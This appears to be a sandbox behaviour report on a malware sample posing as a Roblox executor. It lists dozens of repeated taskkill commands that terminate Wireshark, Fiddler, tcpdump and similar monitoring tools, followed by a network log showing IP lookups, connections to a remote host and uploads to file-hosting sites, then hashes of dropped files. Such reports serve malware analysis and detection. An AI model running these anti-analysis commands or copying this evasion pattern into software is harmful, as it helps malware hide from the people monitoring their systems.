C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 91.92.241.69:5555 tcp
US 8.8.8.8:53 69.241.92.91.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
N/A 224.0.0.251:5353 udp
GB 142.250.187.206:443 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 encrypted-tbn2.gstatic.com udp
GB 142.250.180.14:443 encrypted-tbn2.gstatic.com tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
GB 142.250.187.238:443 consent.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.roblox.com udp
DE 128.116.123.3:443 www.roblox.com tcp
DE 128.116.123.3:443 www.roblox.com tcp
US 8.8.8.8:53 css.rbxcdn.com udp
US 8.8.8.8:53 static.rbxcdn.com udp
US 8.8.8.8:53 js.rbxcdn.com udp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 205.234.175.102:443 js.rbxcdn.com tcp
US 8.8.8.8:53 roblox.com udp
US 8.8.8.8:53 roblox-api.arkoselabs.com udp
DE 128.116.123.3:443 www.roblox.com udp
US 8.8.8.8:53 3.123.116.128.in-addr.arpa udp
US 8.8.8.8:53 102.175.234.205.in-addr.arpa udp
GB 128.116.119.3:443 roblox.com tcp
US 8.8.8.8:53 metrics.roblox.com udp
GB 18.244.155.10:443 roblox-api.arkoselabs.com tcp
US 8.8.8.8:53 apis.roblox.com udp
DE 128.116.123.3:443 apis.roblox.com tcp
DE 128.116.123.3:443 apis.roblox.com tcp
US 8.8.8.8:53 apis.rbxcdn.com udp
GB 18.244.155.10:443 roblox-api.arkoselabs.com udp
IE 2.18.24.24:443 apis.rbxcdn.com tcp
US 8.8.8.8:53 locale.roblox.com udp
US 8.8.8.8:53 images.rbxcdn.com udp
US 205.234.175.102:443 images.rbxcdn.com tcp
DE 128.116.123.3:443 locale.roblox.com udp
US 8.8.8.8:53 auth.roblox.com udp
US 8.8.8.8:53 3.119.116.128.in-addr.arpa udp
US 8.8.8.8:53 10.155.244.18.in-addr.arpa udp
US 8.8.8.8:53 24.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 ecsv2.roblox.com udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
DE 128.116.123.3:443 ecsv2.roblox.com udp
US 8.8.8.8:53 tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 store8.gofile.io udp
US 206.168.191.31:443 store8.gofile.io tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 31.191.168.206.in-addr.arpa udp
US 206.168.191.31:443 store8.gofile.io tcp
US 206.168.191.31:443 store8.gofile.io tcp
US 8.8.8.8:53 freeimage.host udp
US 172.67.204.206:443 freeimage.host tcp
US 8.8.8.8:53 206.204.67.172.in-addr.arpa udp
NL 91.92.241.69:6060 91.92.241.69 tcp
N/A 127.0.0.1:63963 tcp

Files

C:\Users\Admin\dllhost.exe

MD5 4a7f75343aaa5a4d8d18add50ccf3139
SHA1 110c62eee6d7deb4aa9d601c942eae43482d2125
SHA256 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
SHA512 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

memory/2916-30-0x00007FFA6F6C3000-0x00007FFA6F6C5000-memory.dmp

memory/2916-33-0x00000000006E0000-0x00000000006FA000-memory.dmp

C:\Users\Admin\Prism Executor.exe

MD5 fa819e23d8fee4ea89aaaea55e0b28f5
SHA1 18335d4e0d140dcab66c7197c57f669251898ce5
SHA256 bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
SHA512 e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

memory/2832-167-0x0000000002780000-0x00000000027B6000-memory.dmp

memory/2832-189-0x00000000053C0000-0x00000000059E8000-memory.dmp

memory/2832-534-0x0000000005100000-0x0000000005122000-memory.dmp

memory/2832-623-0x0000000005340000-0x00000000053A6000-memory.dmp

memory/2832-608-0x0000000005220000-0x0000000005286000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttqcrark.wh4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2832-784-0x0000000005AF0000-0x0000000005E44000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe

MD5 58545dc488990ac11872079d119f8284
SHA1 dade5c16834d582a5187041697cc5a7c2eae2f88
SHA256 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc
SHA512 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\VCRUNTIME140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_tkinter.pyd

MD5 0f1aa5b9a82b75b607b4ead6bb6b8be6
SHA1 5d58fd899018a106d55433ea4fcb22faf96b4b3d
SHA256 336bd5bffdc0229da4eaddbb0cfc42a9e55459a40e1322b38f7e563bda8dd190
SHA512 b32ea7d3ed9ae3079728c7f92e043dd0614a4da1dbf40ae3651043d35058252187c3c0ad458f4ca79b8b006575fac17246fb33329f7b908138f5de3c4e9b4e52

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tk86t.dll

MD5 e3c7ed5f9d601970921523be5e6fce2c
SHA1 a7ee921e126c3c1ae8d0e274a896a33552a4bd40
SHA256 bd4443b8ecc3b1f0c6fb13b264769253c80a4597af7181884bda20442038ec77
SHA512 bfa76b6d754259eabc39d701d359dd96f7a4491e63b17826a05a14f8fdf87656e8fc541a40e477e4fef8d0601320dd163199520e66d9ee8b5d6bb5cd9a275901

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\init.tcl

MD5 e10e428598b2d5f2054cfae4a7029709
SHA1 f8e7490e977c3c675e76297638238e08c1a5e72e
SHA256 61c55633fa048deb120422daed84224f2bb12c7c94958ca6f679b219cf2fa939
SHA512 88ef7628af5b784229dda6772c6ddd77905238a1648d4290b496eafeec013107437218e4834b7198aeb098bc854dcb9f18083c76dd5bf3ce9cedf3d5c9e4faae

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\encoding\cp1252.enc

MD5 5900f51fd8b5ff75e65594eb7dd50533
SHA1 2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512 ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl86t.dll

MD5 ad03d1e9f0121330694415f901af8f49
SHA1 ad8d3eee5274fef8bb300e2d1f4a11e27d3940df
SHA256 224476bedbcf121c69137f1df4dd025ae81769b2f7651bd3788a870a842cfbf9
SHA512 19b85c010c98fa75eacfd0b86f9c90a2dbf6f07a2b3ff5b4120108f3c26711512edf2b875a782497bdb3d28359325ad95c17951621c4b9c1fd692fde26b77c33

memory/4384-1013-0x0000000005F80000-0x0000000005FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\vistaTheme.tcl

MD5 ad2d78020875529834dd0ea74251e2d3
SHA1 80cc99972a056396dd55e9505ccb02e16462b115
SHA256 ce1a53a769de9e230f586efafd2fb455980b45941e5db553bd3a2f0062b50f3e
SHA512 59ec21a44769fec0b462f0675217882ecf5cbc64056024e4259d91233a1397b4b89957bd474387c992a8753dc9c350fda7e6e5c6e9d29c655d62362a018e2194

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tcl\encoding\symbol.enc

MD5 1b612907f31c11858983af8c009976d6
SHA1 f0c014b6d67fc0dc1d1bbc5f052f0c8b1c63d8bf
SHA256 73fd2b5e14309d8c036d334f137b9edf1f7b32dbd45491cf93184818582d0671
SHA512 82d4a8f9c63f50e5d77dad979d3a59729cd2a504e7159ae3a908b7d66dc02090dabd79b6a6dc7b998c32c383f804aacabc564a5617085e02204adf0b13b13e5b

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\xpTheme.tcl

MD5 1026799ffe26aaa8661f64d6f2cbe4dd
SHA1 5cd337feb3130d146134e06c4a1826ba29157e7a
SHA256 ff421674388da5d3a0c687f342f8d1e3c7f247f3cb59d5512b31f91a54a4c318
SHA512 90f1062caa87c0d65aede1d71370ebe35ad90f4033e6077169b7168b4754c0ff46a9f6348f4d907dcf20ab8f63bb6e0d106a05f068c5abeb86d26f5ea00f503c

C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\tk\ttk\winTheme.tcl

MD5 8b4813a1c6915fd35b52ac854230bcc1
SHA1 db981087f2a311361446014fadbd8b199d856716
SHA256 05fad058280e7a8947a9f71122b442b92d7d578b4618b08bf0b71b6dac5aa22f
SHA512 e0a69e94aabd725b441d6c4920f1cd54451bcc00090d9319cb55286a46a7f35066d1959de149d900198f777671004f6d8a64e7d31e42f8a76e89ed122a79a9ff

